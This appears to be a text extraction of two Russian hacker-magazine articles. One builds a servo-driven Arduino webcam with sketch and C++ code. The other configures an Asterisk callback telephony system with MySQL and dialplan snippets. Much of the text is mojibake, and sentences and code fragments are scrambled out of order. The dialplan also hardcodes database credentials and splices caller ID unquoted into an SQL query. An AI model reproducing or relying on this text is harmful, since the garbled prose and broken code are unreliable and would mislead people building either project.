сложных приложений конструктор программ не подходит. разрабатываемое сообществом русских программистов.Схема приложения тестирования сервера (шаг 3) INFO Среда для графического проектирования приложений — HiAsm связь между двумя другими точками.

Приступим? ×ÒÎ ÒÀÊÎÅ ARDUINO? Девайс. что внешний программатор не нужен. Все эти данные — лишь для общего развития. ïîðà ïåðåõîäèòü â äðóãóþ ëèãó. это значит. Ìîæíî íà÷àòü ñ ôèçèêè è óçíàòü. Разбираться в его основах было бы чрезвычайно скучно. к счастью. задающий тактовую частоту работы микроконтроллера (МК). представляет собой простую и удобную плату ввода/вывода со встроенной средой разработки на языке специальном языке Wiring. а сразу покажем его в действии. от простых (7 проводков от LPT-порта к ножкам МК) до сложных (часто и сами они построены на МК). В микроконтроллер предварительно прошивается загрузчик (бутлоадер). взять у товарища. Нам важно знать другое. Общая проблема программаторов в том.com Âåá-êàìåðà íà ñåðâîïðèâîäàõ Ñîâìåùàåì ïðîñòîé êîä è æåëåçî ñ ïîìîùüþ Arduino Åñëè òû âñþ æèçíü çàâèäîâàë ãèêàì èç àìåðèêàíñêèõ ôèëüìîâ. придется немало попыхтеть. «В чем фишка?». Задача — проапгрейдить обычную веб-камеру. изучить множество материала. и только потом получить какой-то осязаемый результат. êîòîðûå èç âñÿêîãî õëàìà ëîâêî äåëàþò ðîáîòîâ èëè ñèñòåìû êîíòðîëÿ äîñòóïà. — íàñòàë òâîé ÷àñ. Но. А теперь почувствуй разницу: для Arduino программатор не нужен. попробовать полученные знания в деле. à õî÷åòñÿ. то должен отлично это понимать. à ìîæíî ñðàçó êóïèòü êîíòðîëëåð Arduino è äåéñòâîâàòü. Для разных МК и других нужд существует куча программаторов — от специализированных (шьет только AVR) до универсальных (шьет все). На каждой плате обязательно присутствуют линейный стабилизатор напряжения 5 В для питания микроконтроллера и 16 МГц кварцевый резонатор. что язык этот фактически является C++. И всетаки. ÷åì îòëè÷àåòñÿ òðàíçèñòîð îò êîíäåíñàòîðà. Êîãäà ïèñàòü îáû÷íûå ïðîãðàììû íàäîåäàåò. И в этом нам поможет замечательная разработка — контроллер Arduino. ÷òîáû êîä çàñòàâèë ðàáîòàòü ÷òî-òî ôèçè÷åñêîå. снабдив ее возможностью поворачиваться в нужном направлении по нашей команде. Прошивка может заливаться в нее через обычный USB-шнурок. поэтому мы не будем долго размусоливать теорию. поэтому нет никакой необходимости осваивать набор программ контроллера и фактически писать программу на ассемблере. Программирование микроконтроллеров на базовом уровне — не такая уж и сложная вещь.PC_ZONE Владимир Савинов noonv13@gmail. спаять самому). Если ты внимательно читал замечательные статьи во «Фрикинге» по этой теме. саму Arduino можно использовать как программатор и шить ею другие МК! Питаться Arduino может как от внешнего постоянного напряжения 9-12В (то есть запитать ардуину можно от блока питания компьютера или XÀÊÅÐ 10 /141/ 10 . Более того. есть вариант создать работающий девайс здесь и сейчас самой малой кровью. Прелесть в том. — спросишь ты. Суди сам: чтобы залить (прошить) программу в большинство микроконтроллеров требуются специальные устройства — программаторы. и прошивка пользовательских программ (так называемых скетчей) производится из Arduino IDE нажатием одной кнопки. Плата Arduino состоит из микроконтроллера ATmega328 или ATmega168 030 и небольшой элементной обвязки для программирования и интеграции с другими схемами. ïóòü äàæå ðîáîòà íà ñòîëå. который мы выше назвали Arduino. что их надо где-то взять (купить. чтобы сделать что-то действительно стоящее.

Arduino превращается в конструктор для быстрого прототипирования и воплощения в жизнь самых безумных идей. Есть GSM-шилд для взаимодействия с сотовой сетью. их можно подключать к Arduino напрямую. Вообще для движения камеры можно было бы использовать специальные моторчики. Плюс сервы в том. Все это дает невероятную возможность на простой платформе создавать сложные и хитроумные девайсы. В результате.д.linuxcenter. Короче говоря. если хочешь сэкономить. Само название Arduino является торговой маркой. нужна только сама плата и USB-шнурок типа A-B. Цена вопроса — от $30.sparkfun. так и через популярную среду программирования микроконтроллеров семейства AVR — WinAVR. питать сервомашинки (особенно мощные) лучше от отдельного источника. которые невероятно расширяют возможности контроллера. Разумеется. В нашем распоряжении есть веб-камера и Arduino.ru/shop/embedded/ arduino) или. По сути. прелесть Arduino не заканчивается в простоте подключения и легкости программирования под него. Схема подает питание на моторчик и крутит им до нужного угла (сопротивления резистора). для управления положениями закрылок. не требующий при этом паяльник. которая использует язык Wiring (по сути. К этим выводам подключаются многие другие девайсы. Arduino — это плата ввода/ вывода. ÓÏÐÀÂËßÅÌÀß ÊÀÌÅÐÀ Чтобы не быть голословным. Простота в освоении Arduino привлекает новичков.д. Зато помимо моторчиков приводить в движение легкую камеру можно еще и с помощью сервомашинок. что никаких дополнительных модулей для управления не требуется. Мы же сегодня попробуем еще одну отрасль. если что-нибудь повернет вал из нужной точки. Приобрести сервомашинки можно опять же в любом интернет-магазине электроники по $5 за штуку. Это второй момент. и кроме того. ÂÇßÒÜ È ÑÄÅËÀÒÜ Освоить работу с микроконтроллером можно буквально за один вечер. Приобрести оригинальную плату Arduino можно. которыми может управлять микроконтроллер. Более того. вернет ее на место. Для этого нужно понимать несколько вещей. что напрямую к портам Arduino можно подключать только обычные светодиоды (да и те нужно включать через токоограничительный резистор). Для того. Программировать Arduino можно как из родной среды — специальной Arduino IDE. сервоприводы нужны в первую очередь. вызывают негодование у профессиональных программистов микроконтроллеров. которые ты можешь подключить к своей программе. так и от USB-порта компьютера. Сервомашинка — это мото-редуктор. что токи.arduino. цифровая отмычка в виде универсального ключа — все это возможно с помощью Arduino. требуется силовой модуль (так называемый драйвер). Любая возможность автоматизировать что-то с легкостью реализуется с Arduino! Выкладывать ритм сердцебиения в Twitter? Или через инет удаленно включить полив цветов? Легко! Автоматизация аквариума. его необходимо программировать. как и в любом холиваре. но маломощную и самую дешевую SG-90 можно подключать прямо к USB. датчиков и т. элементы умного дома. всего несколькими строчками кода можно управлять сервомашинками. и поэтому все платы-клоны называются иначе (хотя и имеют в своем названии «duino»): например. Arduino. здесь есть своя правда у обеих сторон. Документация на Arduino доступна на официальном сайте Arduino (www. Нам доступны 14 цифровых вводов/выводов и шесть аналоговых входов. для Arduino разрабатываются так называемые шилды — платы-дополнения (модули. которым к ПК подключаются принтеры. сообщающие. моделистам. поэтому у оригинального Arduino существует множество клонов. это обычный C++). то он просто сгорит. способный поворачивать выходной вал на заданный угол и удерживать его в этом положении. Freeduino. например.Сервопривод стоимостью Схема подключения сев$5 ров к Arduino Классическая плата Arduino . www. При этом управлять сервой очень просто — у нее есть три провода: 031 . Поэтому и получается. в которой так силен микроконтроллер — робототехнике. там замирает и. Любым же исполнительным устройствам типа моторчиков требуются для работы токи намного большие. Огромное число энтузиастов пишут для микроконтроллера программные библиотеки — своего рода модули. кодовый замок или. только аппаратные). Резистор подключен в схему контроля и своим текущим сопротивлением сообщает о текущем положении вала. в Linuxcenter (www. Но чтобы управлять обычными моторчиками. Помимо этого под открытой лицензией распространяется и схема микроконтроллера.д.cc). Если не вдаваться в подробности. рулей и вертолетных лопастей. то цифровые порты Arduino позволяют работать с логическими 0 и 1. Например. Это первое. в какое положение нужно повернуть выходной вал (и резистор соответственно). Обычно в роли такого драйвера выступает микросхема L293D (именно на базе этой микросхемы построен Motor-шилд — дополнительная плата. Зачем он нужен? Дело в том. Это сложно. как и любому контроллеру. На схему контроля поступают сигналы управления. GPS-шилд для взаимодействия с GPS-приемниками.наша отправная точка ноутбука. чтобы начать работать с микроконтроллером. очень малы (не более 40 мА на порт). Seeduino или отечественный аналог — CraftDuino. подключаемая к Ардуино и позволяющая управлять двумя моторчиками). Wi-Fi-шилд для работы с беспроводными сетями и т. ÊÀÊ ÓÏÐÀÂËßÒÜ ÑÅÐÂÎÏÐÈÂÎÄÎÌ? Вообще. Условие — сделать управляемую камеру и управлять углом ее обзора с компьютера. Разумеется. В последнем случае код необходимо писать на чистом C. наоборот. батареек или аккумуляторов). И если подключить их напрямую к МК. что надо запомнить. С их помощью мы можем передавать команды или наоборот получать какие-то данные. Вал мотор-редуктора жестко связан с движком переменного резистора. Приводить в движение мы ее будем с помощью так называемых сервоприводов. попробуем взять вполне полезную задачу. ÄÎÏÎËÍÈÒÅËÜÍÛÅ ØÈËÄÛ Впрочем. Но без программы микроконтроллер — это не более чем бесполезная железка. в каком-нибудь западном интернет-магазине (скажем. вроде моторчиков. взаимодействовать с компьютерной клавиатурой/мышкой и т. Ethernet-шилд позволяет подключить Arduino к компьютерной сети и даже работать в интерXÀÊÅÐ 10 /141/ 10 нете (клиентом или сервером). чтобы он начал выполнять какие-то задачи. Аналоговые входы позволяют считывать значение напряжение на порту с точностью до 5 мВ.com).

write(pos). С механикой разобрались. analogWriteCallback). Firmata — это протокол. осталось собрать схему управления и написать две программы: одна для Arduino.write(value). можно увидеть 032 Прошивка залита на картинке. • питание +5 вольт (красный). В нашем случае углы поворота сервомашинок мы будем передавать по последовательному порту с управляющей программы на ПК.setFirmwareVersion(0. Для взаимодействия с программой на ПК мы тоже не будем выдумывать свой велосипед. Управление импульсное. int value) { if(pin == 7) servo7.h> Servo myservo.cc/en/ Reference/Servo). Чтобы удерживать определенную позицию — импульс должен повторяться. // ïîâîðà÷èâàåì ñåðâó íà óãîë value if(pin == 8) servo8. // æäåì 15 ìñ ïîêà ñåðâà çàéìåò íîâîå ïîëîæåíèå } // è îáðàòíî for(pos = 180. что у меня получилось. что сигнальный провод слаботочный — импульсы можно давать непосредственно с ноги микроконтроллера. по сигнальному проводу. чтобы управлять камерой. так же как и библиотека Servo. который я по ходу поясню в комментариях: #include <Firmata. // ñåðâà ïîäêëþ÷åíà ê äåâÿòîìó ïèíó } void loop() { for(pos = 0. Берем Arduino или аналог (в моем случае — CraftDuino) и просто подключаем сервомашинки напрямую к плате по схеме.глаза для робота • земля (коричневый/черный). pos < 180. То. pos-=1) // îò 180 äî 0 ãðàäóñîâ { myservo. В результате недолгих экспериментов у меня получился следующий код для Arduino. для работы с сервомашинками есть готовая библиотека Servo (идет в составе Arduino IDE).attach(8). Все это может звучать сложно. На качалку первой сервомашинки прикрепим веб-камеру. // óñòàíàâëèâàåì ïîëîæåíèå delay(15). } } ÏÈØÅÌ ÏÐÎÃÐÀÌÌÓ ÄËß ARDUINO Для того. В результате очень просто можно набросать код. нам понадобится две сервомашинки.write(pos). Особая прелесть состоит в том.arduino.PC_ZONE Компиляция завершена Программа для управления камерой OpenCV . а другой — к восьмому. // äëÿ ðàáîòû ñ ñåðâîìàøèíêàìè // ôóíêöèÿ. 2). Вот и все :). Задача упрощается еще и потому.h> Servo servo7. Firmata.begin(9600). которая. pos += 1) // îò 0 äî 180 ãðàäóñîâ { // ñ øàãîì â 1 ãðàäóñ myservo. но на деле довольно просто. уже входит в стандартный набор библиотек Arduino IDE. servo7. Теперь закрепим первую серву на качалке второй — она отвечает за азимутальный угол поворота. // èíèöèàëèçàöèÿ áèáëèîòåêè Firmata XÀÊÅÐ 10 /141/ 10 . } void setup() { // óñòàíàâëèâàåì âåðñèþ ïðîòîêîëà Firmata. // ïåðåìåííàÿ äëÿ õðàíåíèÿ ïîçèöèè ñåðâû void setup() { myservo. приведенной на картинке. // óêàçûâàåì ïîðò ïîäêëþ÷åíèÿ ñåðâû servo8.h> #include <Servo. Схема управления очень проста. Как я уже сказал. delay(15). // îáúåêòû êëàññà Servo Servo servo8. // ñîçäàåì îáúåêò äëÿ êîíòðîëÿ ñåðâû // ìàêñèìàëüíîå êîëè÷åñòâî òàêèõ îáúåêòîâ — 8 int pos = 0.attach(7). • сигнальный (оранжевый/желтый/белый).attach(ANALOG_MESSAGE.attach(9). îáðàáàòûâàþùàÿ àíàëîãîâûå ñîîáùåíèÿ Firmata void analogWriteCallback(byte pin. а воспользуемся готовой библиотекой Firmata.write(value). pos>=1. То есть управляющий выход одной сервы подключаем к седьмому порту. позволяющий простым образом общаться программе на контроллере Arduino с программами на компьютере. которая будет отвечать за высоту (широту) поворота камеры. который заставит серву делать поворот от 0 до 180 градусов и обратно: #include <Servo. // çàäàåì ôóíêöèþ-îáðàáîò÷èê ñîîáùåíèé Firmata. Arduino просто должна получить значение угла поворота и повернуть нужную серву на заданный угол. а второй будет управляющая программа для ПК. что в комплекте штатных библиотек Arduino IDE уже есть библиотека Servo для управления сервомашинками (www.

net/ projects/winavr • Сообщество любителей Arduino в ЖЖ: community. ÓÏÐÀÂËßÞÙÀß ÏÐÎÃÐÀÌÌÀ Разработать программу для ПК ты можешь на любом удобном для тебя языке программирования.Send(buf. Так как в дальнейшие планы входит научить этого миниweb-cam-бота самостоятельно обнаруживать объекты и следить за ними. которая и выполняет поворот изображения. а здесь я приведу только функцию-обработчик. После завершения компиляции в строке состояния появится сообщение «Done compiling».zip). собственно. что через минимальное время ты можешь получить результат. Фактически. sg. Так как в моей конструкции робота веб-камеру пришлось закрепить на боку. затем указать порт. Если все прошло хорошо. // ïîëîæåíèå âòîðîé ñåðâû int F = 0. что Arduino годится разве что для новичков. Остается только нажать кнопку «Загрузить скетч в Arduino». и программа начнет прошиваться в МК. int Amax = 180. и все. то на освоение всей платформы у тебя едва ли уйдет больше одного вечера. с помощью которых будем управлять положением сервомашинок. Для этого необходимо запустить Arduino IDE. то в программе приходится это исправлять (поворачивать картинку на 90 градусов против часовой стрелки). вставить код и нажать на кнопку компиляции.ru/files/ opencv/servobot/ servobot. IplImage* dest = 0. Эта процедура реализуется функцией rotate().net/projects/opencvlibrary). но я выбрал С++.processInput().Ура. к которому она подключена («Tools Æ Serial Port»). OpenCV — это набор данных. то для работы с камерой я воспользуюсь библиотекой OpenCV (sourceforge. механика и электроника готовы! Осталось написать программу для управления этим мини-роботом. загрузка завершается сообщением «Done uploadling». Их также можно скачать из инета (robocraft. Sleep(100). так и коммерческих целях. двигаем ползунки. выбрать свою версию платы через меню «Tools Æ Board». buf[2] = (A >> 7) & 0x7F. buf[1] = A & 0x7F. Полный код программы ты найдешь на диске. } • Документация по Arduino: www. то что? Главное. что она «видит». Теперь момент истины. // // ôóíêöèè-îáðàáîò÷èêè ïîëçóíêîâ // void myTrackbarA(int pos) { A = pos.DVD dvd Исходники прошивки для Arduino и программы на С++ ты найдешь на диске. 3). являющейся оберткой вокруг функXÀÊÅÐ 10 /141/ 10 Веб-камера на двух сервоприводах ции OpenCV: cvWarpAffine().arduino. и — да.cc • Блог по компьютерному зрению: robocraft. которая до первой версии разрабатывалась в Центре разработки программного обеспечения Intel (причем российской командой в Нижнем Новгороде).com/ ru_arduino Вот. Выбираем порт } HTTP://WWW void loop() { while(Firmata. Компилируем код. Идея нехитрая: подключаемся к веб-камере и показываем то. Эта библиотека очень популярна за счет своей открытости и возможности бесплатно использовать как в учебных. // çàïóñêàåì ôóíêöèè-îáðàáîò÷èêè } links Теперь этот несложный код компилируем и заливаем получившуюся программу в Arduino. функций и классов для обработки изображений алгоритмами компьютерного зрения. Сервоприводы издают звук. возможно.ru/blog/ computervision • WinAVR: sourceforge. z 033 . Бывалые фрикеры. Но даже если так. который считывает положение ползунков в управляющей программе и отправляет их в качестве команды на микроконтроллер: // ïîëîæåíèå ïåðâîé ñåðâû int A = 0. камера двигается! Работает! Если у тебя возникнет желание повторить подобный опыт.available()) // åñëè åñòü ñîîáùåíèÿ Firmata. int Fmax = 180. livejournal. скажут. Также выведем в окошко с картинкой пару ползунков. // Firmata char buf[3]. buf[0] = 0xE0 | 7. Это открытая библиотека компьютерного зрения. Каких-то несколько часов — и ты уже можешь создавать работающие девайсы. пробуем его запустить.

. Это называется обратным звонком. Elastix и т. ×òîáû îáîéòè ýòó ïðèâÿçàííîñòü ê èíòåðíåòó. Я не рекомендую использовать для наших целей сборки типа TrixBox. а также можешь прочитать их на сайте (www. которое нам очень нужно. Тебе остается набрать специальный PIN-код (выполнить авторизацию) и номер для звонка. в том числе бесплатный сервер Asterisk. безусловно. íè äàæå â VoIP-êëèåíòå. На него мы будем звонить. что нужно сделать — это купить и зарегистрировать на Asterisk местный городской номер. а с ним могут возникнуть проблемы: на древних и не очень древних АТС не всегда работает определение Caller ID. оно ошибочно. и специальный сервис позвонит обоим абонентам. чтобы все заработало. не покупать SIP-номер. дополнительное звено в цепочке только понизит надежность системы. где установлен специальный сервер. а использовать обычный аналоговый. после чего дожидаться соединения. в Москву — другой.xakep. Можно купить несколько и при звонках за рубеж использовать один. я сейчас не буду. а они стоят дорого: примерно от 5000 рублей за порт.ru/magazine/xa/107/152/1. который отдается по SIP. открывая страницу такого сервиса в веб-браузере. у 034 нас были две статьи. через который мы будем звонить. Схема такая: ты звонишь на определенный номер. Система callback существует давно и предлагается многими VoIPкомпаниями. äàæå åñëè óñòàíîâèòü íà ìîáèëüíûé òåëåôîí êàêîé-íèáóäü Skype-êëèåíò. êîòîðàÿ áóäåò çâîíèòü îáîèì àáîíåíòàì ïî VoIP è ñâÿçûâàòü èõ ìåæäó ñîáîé. Asterisk будет сердцем нашей системы. предпочтительнее.asp). Штука удобная и довольно простая в организации. òû ñìîæåøü èñïîëüçîâàòü åãî òîëüêî ïðè íàëè÷èè Wi-Fi èëè 3G. Выбор большой. Но тогда придется докупить VoIPшлюз с FXO-портом.ru/magazine/xa/108/154/1. По этой причине SIP-номер. xakep. Про базовую установку сервера и первичную настройку.д. Можно зайти на сайт. PDF-версии ты найдешь на диске. по России — третий. Совсем другое дело — организовать удобный сервис саму. В качестве номера можно использовать свой сотовый номер. ÌÈÍÈ-ÀÒÑ Если при слове «Мини-АТС» у тебя возникает ассоциация с жутко дорогостоящим оборудованием. но использовать постоянно — нет. Итак. ввести два номера телефона. Но повторять то. Этим можно воспользоваться разок где-нибудь за границей в роуминге. тот сбрасывает звонок и сам перезванивает. Я даже пользовался когда-то этим с мобильного телефона. Собственно. Еще пара замечаний. конечно. предположим. который приходит по меди. Да и вообще. Следующий шаг — покупка (и настройка) аккаунта у VoIP-провайдера. только для подключения его к Asterisk потребуется VoIP-GSM шлюз. íè â ïðîäâèíóòîì òåëåôîíå. Есть обходной путь — использовать для XÀÊÅÐ 10 /141/ 10 . чтобы соединить их между собой.PC_ZONE Алексей «Aggressor» Соколов Ñáåðå÷ü òåëåôîííûé áàëàíñ Ïîäíèìàåì ñèñòåìó îáðàòíîãî äîçâîíà Callback Ñàìûé âåðíûé ñïîñîá ñýêîíîìèòü íà çâîíêàõ — èñïîëüçîâàòü IP-òåëåôîíèþ. которое устанавливается в офисах.asp и www. или callback’ом. что Asterisk у нас есть. Можно. ìîæíî îðãàíèçîâàòü ñèñòåìó callback. о чем мы писали отдельные статьи. Помимо аппаратных АТС’ок. огромное распространение получили программные продукты. Первое. проще будет установить и настроить все вручную. Íî. ê ñîæàëåíèþ.  ýòîì ñëó÷àå íåò íåîáõîäèìîñòè íè â èíòåðíåòå.

NoOp(zvonyat s nomera ${CALLERID(all)}) exten => 310309.MYSQL(Clear ${resultid}) exten => 310309.MYSQL(Query resultid ${connid} select pin. Но что.GoToIf($["${pin}" != ""]?ivrpass. Голосовые меню..Answer() . называются 035 . нужно дополнить наш контекст [fromgorod]: exten => 310309. а далее — номер для звонка.n. Если с номера 8901234567.Îòâå÷àåì Каждая строчка. чтобы записывать в нее логи звонков — CDR.MYSQL(Connect connid localhost asterisk asterisk asterisk) exten => 310309. который позволит пользоваться такой схемой звонков максимально удобно — по сути. если их будет 50? Изящнее всего прописать всех пользователей в специальной базе данных.s.NoOp(pin -> ${pin} callback# -> ${callback}) exten => 310309. Итак. что номер может приходить без 8 в начале. Мы в этой базе создадим еще одну таблицу — callback. звонок будет отправляться на голосовое меню (IVR).n.%Y%H:%M:%S)}) exten => 310309. чтобы произвести авторизацию пользователя.n.1. переменная callback. Строка «exten => 310309. если же номер другой. в котором будет предложено набрать PIN-код. то вызов уходит в контекст IVR.GoToIf($["${CALLERID(number)}" = "8901234567"]?ivr.. которые взаимодействуют с пользователем..n. и. Функция NoOp позволяет вывести в консоль Asterisk текст или состояние переменной.NoOp(zvonyat s nomera ${CALLERID(all)}) exten => 310309. 'pin' int(11) NOT NULL default '4321'.1)». PIN-код. 'user' varchar(255) NOT NULL default '' ). как ввести PINкод.n.1)» — это неполное ветвление.n. по сути. когда все приготовления выполнены.%m.Îòâå÷àåì . Для этого в консоли набираем «mysql -u asterisk -p asterisk».1.Answer() . в который приходят все входящие извне звонки: у меня он называется [fromgorod]. то прописать под каждый их номер еще одну строчку в конфиге не будет большой проблемой. то есть как будут себя вести все входящие и исходящие вызовы) и находим контекст. звонящему нужно будет только выбрать контакт в записной книге. оно проверяет.n. 'callback' int(11) NOT NULL default '0'. а подключается прямо к SIM-карте (смотри картинку).NoOp(${STRFTIME(${EPOCH}.n. Asterisk настроен по инструкциям из статей. После ввода пароля создаем таблицу (телефон. база с данными есть. Для работы системы это не нужно.conf (в этом файле описывается план набора. Первая строка выводит в консоль Caller ID звонящего.%d. что поменяем так называемый контекст.n. тогда обработка вызова пройдет по обычной схеме.%d. и обработать вход.s.NoOp(${STRFTIME(${EPOCH}. таблицу и запрос на ввод пароля.. имя) и заполняем параметрами одного из пользователей: CREATE TABLE 'callback' ( 'phone' varchar(80) NOT NULL default ''. с какого номера пришел вызов.MYSQL(Disconnect ${connid}) exten => 310309. Для сотового телефона желательно прикупить любой SIM Dialer. говорит сама за себя: сначала обращаемся к базе. далее указываем пользователя. '2602'.%Y%H:%M:%S)}) exten => 310309.MYSQL(Fetch fetchid ${resultid} pin callback) exten => 310309. Пусть мой городской номер 310309: [fromgorod] exten => 310309.n. ÍÀÑÒÐÀÈÂÀÅÌ IVR Итак. но при отладке очень полезно.s. стоимость которого не превышает 1000 рублей. Вместе с Asterisk часто используют MySQL. можно приступать к организации нашего сервиса. В результате на XÀÊÅÐ 10 /141/ 10 сервере создается база Asterisk..n. И начнем мы с того. INSERT INTO callback(phone.. и тогда дальше обработка вызова пойдет в контексте ivr-pass. далее с помощью SQL-запроса получаем параметры для номера звонящего абонента и обрабатываем их. а вторая — дату и время звонка. При входящем звонке система будет определять номер звонящего. Обрати внимание.GoToIf($["${CALLERID( number)}" = "8901234567"]?ivr. Стоит такая штука копейки. Что дальше? Необходимо проиграть ему инструкции. ÎÁÐÀÁÎÒÊÀ ÇÂÎÍÊΠТеперь. то переменная pin будет не пустой. если он есть в «списке».s. callback from callback where phone=${CALLERID(number)}) exten => 310309. а звонок и запрос к callback-системе будет произведен автоматически. Для этого открываем на Астериске файл /etc/asterisk/extensions. Если в результате запроса номер найдется в базе. 'Aggressor')..1) exten => 310309.n. в которой есть таблица CDR. pin.1) exten => 310309. Если callback-системой будет пользоваться пара человек. Непонятной может показаться последняя строчка «GoToIf($["${pin}" != ""]?ivr-pass.n. user) values('8901234567'. как же Asterisk узнает об этом? Все достаточно просто. номер пользователя определяется и сверяется с базой данных.%m.SIM-карта и SIM Dialer для нее Создаем таблицу в MySQL этого 3G-модем.

Прежде чем подключить модем. Никто не мешает. перезапускаем Астериск — он готов к работе. Она же снимет привязку к определенному оператору. оно нам не нужно.1. [ivr] exten exten exten exten exten exten exten exten exten exten exten exten exten =>s.n. Так или иначе.Set(inum=$[${inum} + 1]) exten => i.Set (tnum=0) exten => s.GoTo(ivr-out. то кладем трубку: exten => t. и контекст для него: [datacard0] audio=/dev/ttyUSB1 data=/dev/ttyUSB2 context=datacard-incoming group=1 rxgain=3 txgain=3 Теперь сохраняет изменения. опять же.n. Если введен PIN не больше четырех символов. В этом конфиге по умолчанию прописаны два устройства [datacard0] и [datacard1] — одно удаляем. org/svn/chan_datacard).n. В нашем меню две опции: 1 — позвонить и 2 — сменить PIN-код: [ivr-out] exten => s.1.n.Hangup exten => t.1.Hangup ÍÀÑÒÐÀÈÂÀÅÌ GSM-ØËÞÇ В качестве номера доступа удобно использовать не только SIPномер.Hangup() => t. Àóòåáÿ? Øëè ÈÈìÿ+Èìÿ íà 5050 3ð' 036 История обработки вызова call-файла Здесь мы воспроизводим ролик WelcomePass (его необходимо предварительно скопировать в /var/lib/asterisk/sounds/ru). нужен VoIP-GSM шлюз.n. который реализует работу с 3G-модемом.1.1.1. вместо Hangup прописать возможность еще пару раз ввести PIN.n.n.49 ð.1. что он поддерживает голос.n./trunk/ etc/datacard. и только после третьей неудачной попытки класть трубку. если были введены четыре символа. Появился? Хорошо.1) XÀÊÅÐ 10 /141/ 10 .Dial(SIP/bla1/${EXTEN} exten => 89XXXXXXXXX . Àíÿ+Ñàøà=ëþáîâü.Hangup exten => 8[2-8]XXXXXXXXX. который активно продают операторы сотовой связи. Если за это время никакой номер не введен.1. звонок перекидывается на контекст ivr-pas: [ivr-pass] exten => s.WaitExten(10) exten => _XXXX.Background(WelcomePass) .n. После того. то мы переходим в контекст ivr.1) => t.Dial(SIP/bla2/${EXTEN} exten => 8495XXXXXXX .PC_ZONE Входящий звонок в CLI с номера.n.1.n.1.GotoIf($["${inum}" < "3"]?s.Dial(SIP/blabla3/${EXTEN} exten => 8[2-8]XXXXXXXXX .Background(Welcome) =>s.1. После трех ошибок кладется трубка.Set(inum=$[${inum} + 1]) => i.n. С его использованием можно не только сделать традиционный callback. exten =>s.n.GotoIf($["${inum}" < "3"]?s. куда подключен шлюз. Чтобы подключить сотовый номер к Астериску. нужно убедиться. Далее воспроизводится ролик Welcome. это может определить прога MICRO-BOX HUAWEI MODEM UNLOCKER.n.conf в /etc/asterisk.32 и выше. GoToIf($["${EXTEN}" = "${pin}"]?ivr.Hangup.Hangup() Контекст ivr начинается с обнуления двух переменных inum и tnum — это количество неверных попыток ввода и количество прошедших таймаутов.1. но и обычный федеральный сотовый. Руками копируем .Hangup exten => 8495XXXXXXX.Playback(pbx-invalid) => i.n.1. Потом ждем выбора пользователя 10 секунд.Set(tnum=$[${tnum} + 1]) exten => t.1) exten => i. как номер абонента определился. которые совпадают с PIN-кодом.Hangup.n.1.1.n.Set(tnum=$[${tnum} + 1]) => t.Playback(pbx-invalid) exten => i.Hangup exten => i.1) => i. для этого отлично подойдет 3G USB-модем HUAWEI Е1550.GoTo(ivr-ch-pin.WaitExten(10) exten => 89XXXXXXXXX. а можно проверить баланс или отправить SMS: CLI>datacardsms datacard0 89000000000 Hello! CLI>datacardussd datacard0 *102# [datacard0] Got USSD response: 'Áàëàíñ 155. но и реализовать обратный вызов через SMS.s. При каждом неверном вводе воспроизводится стандартный ролик pbx-invalid.so в /usr/lib/ asterisk/modules.Set (inum=0) =>s. появился ли chan_datacard. за ним ожидаем ввод номера для звонка.1.GotoIf($["${tnum}" < "3"]?s.Hangup exten => i. кладем трубку: exten => i.s.n. Далее проверяем. Скачиваем и устанавливаем модуль для Asterisk (www.n. Можно прописать контекст и принимать/совершать звонки. которого нет в базе Входящий контекст IVR. то же самое происходит и с переменной tnum.GotoIf($["${tnum}" < "3"]?s.n.1) => 2.1) exten => _XXXX.1) => i.Background(beep) exten => s.makhutov.1. к примеру.s.Hangup() exten => t.6. Меняем разъем. Для нормальной работы нам потребуется ядро 2.Set (tnum=0) => s. а переменная inum увеличивается на 1.Set (inum=0) exten => s.WaitExten(10) => 1.

Когда мы создавали таблицу callback. agi и передает две переменных: номер и UNIQUEID в качестве названия для call-файла. каждое направление соединяется через определенный транк (аккаунт VoIP-провайдера): blabla1.1. Мы звоним на наш номер.1) exten => _XXXX. ÍÀÑÒÐÀÈÂÀÅÌ CALLBACK Добавить гибкости. далее вводим номер телефона. C.1. Context — это контекст.Hangup [callback] exten => s.hangup Первая строка в [callback] запускает скрипт под названием callback.WaitExten(10) exten => _XXXX.. на который Asterisk и перенаправляет наш звонок.то сделали в ней поле callback. Ее плюсы очевидны: можно реально экономить при звонках.Background(WelcomePass) .s.n. сколько времени необходимо ждать поднятия трубки до того. GoToIf($["${callback}"! = "0"]?callback. Тестовый звонок… да. продавая callback как услугу.agi и перемещаем в /var/lib/asterisk/ agi-bin. Можно обойтись одним. ÏËÞÑÛ È ÌÈÍÓÑÛ Результат всех этих действий — полноценная callback-система.${UNIQUEID}) exten =>s.Hangup exten => i. после чего номер набирается заново. можно найти такого VoIPпрова. PHP. Время каждой попытки дозвона — 20 секунд.agi. MaxRetries — параметр определяет количество попыток дозвона. особенно за пределы своего города или в роуминге. Если созданный файл переместить в /var/spool/asterisk/outgoing/. с этого момента система уже работает. который позволяет подставить свой (или даже произвольный) CallerID.n.n. WaitTime — этот параметр указывает. Если во время одной из попыток абонент возьмет трубку.MYSQL(Connect connid localhost asterisk asterisk asterisk) exten => _XXXX. можно при помощи AGI (AsteriskGatewayInterface). который будет набран. Вначале воспроизводится стандартный «бииип». При входящих звонках мы получаем значение этого поля вмести с PIN-кодом.1. В ближайших планах — прикрутить к системе биллинг и реализовать заказ звонка через сайт.WaitExten(10) exten => _XXXX.${callback}.1. Из минусов — при звонке будет теряться твой CallerID. CALL-ÔÀÉËÛ Â ASTERISK'Å Собственно. этим мы и воспользовались.1. Extension — это номер в контексте ivr-pass. файл удалится.n.Hangup() exten => t.1.MYSQL(Disconnect ${connid}) exten => _XXXX. которое по умолчанию равно 0. Еще один минус системы — увеличенное время соединения. после которого можно набирать номер для звонка. Если состояние этого поля не равно 0.exten => t. Priority — это приоритет экстеншина s. но для каждого направления можно выбрать наиболее выгодного VoIP-оператора.1. то Астериск сразу начнет звонить на номер 8901234567 (причем рекоменXÀÊÅÐ 10 /141/ 10 дуется call-файл именно перемещать. Создаем конфиг и заполняем следующим: Channel: SIP/blabla1/8901234567 MaxRetries: 2 RetryTime: 3 WaitTime: 20 Context: ivr-pass Extension: s Priority: 2 Archive: Yes Что за. В конфиге у нас прописаны три направления: сотовые. интерфейса взаимодействия с внешними скриптами. При вызове скрипта из контекста в Астериске ему будут переданы две переменных: номер телефона ($1 в скрипте). авторизуемся с помощью PIN-кода. тогда после выполнения call-файла в /var/spool/asterisk/outgoing_done можно будет посмотреть историю обработки вызова. и за что отвечает: Channel — указывает тип.s. Как только они будут исчерпаны. то система попытается набрать экстеншен s в контексте callback. как прекратить попытку дозвониться. 